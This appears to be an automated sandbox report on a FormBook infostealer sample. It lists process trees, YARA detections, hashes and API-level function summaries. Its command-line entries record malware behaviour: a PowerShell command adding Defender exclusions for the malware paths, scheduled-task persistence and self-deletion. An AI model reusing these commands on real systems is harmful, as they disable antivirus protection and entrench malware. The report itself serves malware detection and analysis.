Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:07:06
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:07:06
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:07:06
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:07:06
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp"
Imagebase:	0x250000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:07:06
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:07:07
Start date:	30/05/2024
Path:	C:\Users\user\Desktop\po8909893299832.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\po8909893299832.exe"
Imagebase:	0xf20000
File size:	627'208 bytes
MD5 hash:	8C2635E6C2804ACE5C6FA487F5E23A87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:07:07
Start date:	30/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:07:08
Start date:	30/05/2024
Path:	C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe
Imagebase:	0x740000
File size:	627'208 bytes
MD5 hash:	8C2635E6C2804ACE5C6FA487F5E23A87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:07:09
Start date:	30/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	05:07:11
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp"
Imagebase:	0x250000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:07:11
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:07:11
Start date:	30/05/2024
Path:	C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Imagebase:	0x350000
File size:	627'208 bytes
MD5 hash:	8C2635E6C2804ACE5C6FA487F5E23A87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:07:11
Start date:	30/05/2024
Path:	C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Imagebase:	0x430000
File size:	627'208 bytes
MD5 hash:	8C2635E6C2804ACE5C6FA487F5E23A87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:07:11
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msdt.exe"
Imagebase:	0x1b0000
File size:	389'632 bytes
MD5 hash:	BAA4458E429E7C906560FE4541ADFCFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:07:12
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cscript.exe"
Imagebase:	0x2d0000
File size:	144'896 bytes
MD5 hash:	CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	05:07:15
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:07:15
Start date:	30/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:08:40
Start date:	30/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4084 -s 3040
Imagebase:	0x7ff760500000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	05:08:47
Start date:	30/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	11

Executed Functions

Function 06BBB1E7 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ae38cf558162782f71b3dcb31df0bd43456a0ff2b8cf62b99a9aebcbc7dee4
Instruction ID: d09401f8e2232c1d3e0573882ee4548f92e26a8375e300d82b58e49ec4f780a1
Opcode Fuzzy Hash: c6ae38cf558162782f71b3dcb31df0bd43456a0ff2b8cf62b99a9aebcbc7dee4
Instruction Fuzzy Hash: 64D09EB9C8D218CED7D0DAA4AC016F9B6B8E70B244F4470D5C85EA3215D6B5C800CE55

Function 0097D3C8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0097D456
GetCurrentThread.KERNEL32 ref: 0097D493
GetCurrentProcess.KERNEL32 ref: 0097D4D0
GetCurrentThreadId.KERNEL32 ref: 0097D529

Strings

4b, xrefs: 0097D555

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4b
API String ID: 2063062207-4238829343
Opcode ID: fd15602aa59d672555d3b522fb8a0ce0df5a08567579b4030ed60857ea29f8fe
Instruction ID: d6c9c4516cb93b42116219ff7f82e862614f9679a9f082a5eed2e14ca230fc0a
Opcode Fuzzy Hash: fd15602aa59d672555d3b522fb8a0ce0df5a08567579b4030ed60857ea29f8fe
Instruction Fuzzy Hash: 825165B09017498FDB14DFAAD948BEEBBF1BF88314F208459E009A73A1DB746945CF61

Function 0097D3D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0097D456
GetCurrentThread.KERNEL32 ref: 0097D493
GetCurrentProcess.KERNEL32 ref: 0097D4D0
GetCurrentThreadId.KERNEL32 ref: 0097D529

Strings

4b, xrefs: 0097D555

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4b
API String ID: 2063062207-4238829343
Opcode ID: ad204a7dd8a909a240e6bfb3eeac43530b225d7f82f0972b48586487a741797f
Instruction ID: be7734f73d41296d008e789f3f829890828d9b5f722aa93487392c33e6740e7b
Opcode Fuzzy Hash: ad204a7dd8a909a240e6bfb3eeac43530b225d7f82f0972b48586487a741797f
Instruction Fuzzy Hash: EA5147B09017098FDB14DFAAD948BAEBBF1BF88314F20C459E409A73A0DB746944CF65

Function 06BB7666 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BB78A6

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4a32d79effb03ba85021187db52054138a3805393cc7fbd5f5efcb3bdbc12e67
Instruction ID: d8df946297fc87423b2e42306320a8be6206c0c6a7d05c16c2ea7ab453422055
Opcode Fuzzy Hash: 4a32d79effb03ba85021187db52054138a3805393cc7fbd5f5efcb3bdbc12e67
Instruction Fuzzy Hash: B4919DB1D0021ADFEB50DF69C8417EDBBB2FF84310F1491A9E849A7250DBB09981CF91

Function 06BB7670 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BB78A6

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 69bbcac91c15209ddf89cf14c6e304e3ecf843b6469793f88d412d5ba876bb24
Instruction ID: 62e8728dae7dbb4ca2c134619cae7df7374b0c7df898b96ed39dff8a904e2d27
Opcode Fuzzy Hash: 69bbcac91c15209ddf89cf14c6e304e3ecf843b6469793f88d412d5ba876bb24
Instruction Fuzzy Hash: C4917CB1D0021ADFEB50DF69C841BEDBBB2FF88310F1491A9D848A7250DBB59985CF91

Function 0097AD48 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0097AF9E

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a081472f3614ab85739be94ce1f8f77197ef9ff23b18f8b52dc10a07f8eefffc
Instruction ID: c91c66a7f4c0ad74073706059287f7c550e1df73468f76dca9d92839f5147c14
Opcode Fuzzy Hash: a081472f3614ab85739be94ce1f8f77197ef9ff23b18f8b52dc10a07f8eefffc
Instruction Fuzzy Hash: C1814471A00B058FDB24DF2AD44579ABBF5FF88304F10892DE48ADBA50DB75E845CB92

Function 009744E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009759C9

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: acd7df59797ce494b4bd7c12c3d8dc2ee67abe4ab3ec93bd81238ae9176e5e20
Instruction ID: 6c4f1a752b3f3d862b9379ae78ca40ba2a31e2c2be5782174b26f71af3f17540
Opcode Fuzzy Hash: acd7df59797ce494b4bd7c12c3d8dc2ee67abe4ab3ec93bd81238ae9176e5e20
Instruction Fuzzy Hash: DA41E271C00719CFDB24DFA9C88478EBBF5BF88704F20816AD409AB251DBB55946CF90

Function 0097590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009759C9

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 12f429f81c0e07925118d4b022c1b7dd70582669932bfafcd7d915cb22a2514a
Instruction ID: 54071e311cbafb0a5d0cbe252d3ec679a6ad62ad0aea5184a6d1f68e82d67b4e
Opcode Fuzzy Hash: 12f429f81c0e07925118d4b022c1b7dd70582669932bfafcd7d915cb22a2514a
Instruction Fuzzy Hash: 2B41CFB1D00719CFEB24DFAAC98478EBBF5BF88704F20816AD409AB251DBB55946CF50

Function 06BB73E2 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BB7478

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ba9cd05fb138f9c3f1200b21a08f3e4c3dc0ec41c309655eed94ee9c16347b5a
Instruction ID: 11b9e3be920b623407139bb7dac6fc9c92bf0050221ee780e9c52dcce6779f32
Opcode Fuzzy Hash: ba9cd05fb138f9c3f1200b21a08f3e4c3dc0ec41c309655eed94ee9c16347b5a
Instruction Fuzzy Hash: FA212AB590030D9FDB10DFA9C981BEEBBF5FF88310F108429E519A7240DB799944DBA1

Function 06BB73E8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BB7478

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ce71ac29f798f0476a28f0e6869e8b340cc816257fc63ac7d5b58cc2ae101f47
Instruction ID: c26537db32d32a3550a6d7fe0021b8d2450fdf5c1e30466fa1d3a1fa3964c7f6
Opcode Fuzzy Hash: ce71ac29f798f0476a28f0e6869e8b340cc816257fc63ac7d5b58cc2ae101f47
Instruction Fuzzy Hash: DA213BB190030D9FDB10DFA9C881BEEBBF5FF88310F108429E519A7240D7799944DB61

Function 0097D618 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097D6A7

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7d61606d392dc030e707344dfdd6c78b7a20475c86968ed9d4596f5d7666922b
Instruction ID: 2b9d5c5325595012017fffaf55953052f77389b92613fe3442930579ad9e8461
Opcode Fuzzy Hash: 7d61606d392dc030e707344dfdd6c78b7a20475c86968ed9d4596f5d7666922b
Instruction Fuzzy Hash: 4D2105B59002499FDB10CFAAD484ADEBBF5FF48310F24841AE959A7210C378A945CF60

Function 06BB74D2 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BB7558

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 808d235da2966cbe43c3f38cf43010ef49354e45b9551dcf4310ef7d89dbd258
Instruction ID: eba967133d7ecbda89c1df12f28845bf16380aacee09c8d24edff3ba7e4f3bcd
Opcode Fuzzy Hash: 808d235da2966cbe43c3f38cf43010ef49354e45b9551dcf4310ef7d89dbd258
Instruction Fuzzy Hash: 2D212AB1C003499FDB10DFAAC881BEEBBF5FF88310F508429E519A7250CB799941DBA4

Function 06BB724A Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BB72CE

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1092adcc9c875f4eceeb7ab5ee58cae3c9dd420b5e2a245c21ab7a01075cd0b2
Instruction ID: 21376f6dfa00cab246cdf0a7a3a794a87185b267c40effde81a5dffcc8e13379
Opcode Fuzzy Hash: 1092adcc9c875f4eceeb7ab5ee58cae3c9dd420b5e2a245c21ab7a01075cd0b2
Instruction Fuzzy Hash: A72138B1D003099FDB24DFAAC4857EEBBF5FF88210F14842AE419A7240CB789945CFA0

Function 06BB74D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BB7558

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0917aa8bd3c4d72601809fe9432dbe5bccc9ca703689f7f4250e1468b8e59e39
Instruction ID: 7ee8ec547fd3138399257f1862b932a58295140d554f707f88ed5981f3a49963
Opcode Fuzzy Hash: 0917aa8bd3c4d72601809fe9432dbe5bccc9ca703689f7f4250e1468b8e59e39
Instruction Fuzzy Hash: E521F8B18003499FDB10DFAAC881BEEBBF5FF88310F50842AE519A7250D7799945DBA4

Function 06BB7250 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BB72CE

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2d8dbcfc63b00f8471d5d79e991209cde96858baa9195fe38f6ba4cbf099194c
Instruction ID: d5be02bd8a0340a35f826c878ee527667e223dc63365529fa51bf82638637e27
Opcode Fuzzy Hash: 2d8dbcfc63b00f8471d5d79e991209cde96858baa9195fe38f6ba4cbf099194c
Instruction Fuzzy Hash: 9A2115B1D003098FDB14DFAAC4857EEBBF4EF88224F14842AE559A7240CB789945CFA4

Function 0097D620 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097D6A7

Memory Dump Source

